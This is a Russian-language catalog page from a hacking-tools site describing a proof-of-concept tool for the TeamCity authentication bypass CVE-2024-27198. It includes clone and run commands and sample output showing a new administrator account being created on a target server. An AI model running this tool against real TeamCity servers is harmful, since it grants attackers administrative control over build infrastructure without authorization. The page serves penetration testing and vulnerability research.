Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-27198 — представляет собой PoC-инструмент, нацеленный на уязвимость в сервере TeamCity (CVE-2024-27198) | Kitploit
Инструменты/GitHubGitHub/geniuszly/cve-2024-27198
Аутентификация и авторизацияАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubgeniuszly/cve-2024-27198

CVE-2024-27198

представляет собой PoC-инструмент, нацеленный на уязвимость в сервере TeamCity (CVE-2024-27198)

Репозиторий
31 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

GenTeamCityExploit — это PoC-инструмент, нацеленный на уязвимость сервера TeamCity (CVE-2024-27198). Он позволяет обнаружить версию TeamCity и создать нового администратора, используя уязвимость обхода аутентификации.

Возможности

  • Извлекает версию сервера TeamCity.
  • Проверяет наличие известной уязвимости (CVE-2024-27198).
  • Создает нового пользователя-администратора, если сервер уязвим.

Требования

  • Python 3.6+: Убедитесь, что у вас установлен Python.
  • Библиотеки: Установите необходимые библиотеки командой:
    root@kitploit:~
    pip install requests urllib3
    

Использование

  1. Клонируйте репозиторий.
    root@kitploit:~
    git clone https://github.com/geniuszly/CVE-2024-27198
    
  2. Перейдите в папку с проектом.
    root@kitploit:~
    cd CVE-2024-27198
    
  3. Запустите скрипт с обязательными параметрами.
    root@kitploit:~
    python3 GenTeamCityAdminCreator.py -t <target_url> -u <username> -p <password>
    
    Параметры:
    • -t, --target: URL целевого TeamCity сервера.
    • -u, --username: Имя пользователя для нового администратора.
    • -p, --password: Пароль для нового администратора.

Пример

root@kitploit:~
python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123

Пример вывода

root@kitploit:~
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123

[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[+] Сервер уязвим! Возвращен HTTP код: 200
[+] Пользователь 'newadmin' создан успешно! Перейдите на http://target-teamcity.com/login.html для входа.

В случае, если сервер не уязвим или версия не найдена:

root@kitploit:~
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123

[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[-] Сервер, вероятно, неуязвим. Возвращен HTTP код: 403

При возникновении ошибки подключения к серверу:

root@kitploit:~
$ python3 GenTeamCityAdminCreator.py -t http://nonexistent-url.com -u newadmin -p securepassword123

[-] Ошибка при попытке соединения с сервером: HTTPConnectionPool(host='nonexistent-url.com', port=80): Max retries exceeded with url: /login.html (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7ff9e1f07df0>: Failed to establish a new connection: [Errno -2] Name or service not known'))

Отказ от ответственности

Этот инструмент предназначен исключительно для образовательных целей и не должен использоваться на каких-либо системах без явного разрешения их владельца. Несанкционированный доступ к компьютерным системам является незаконным.

Скачать инструмент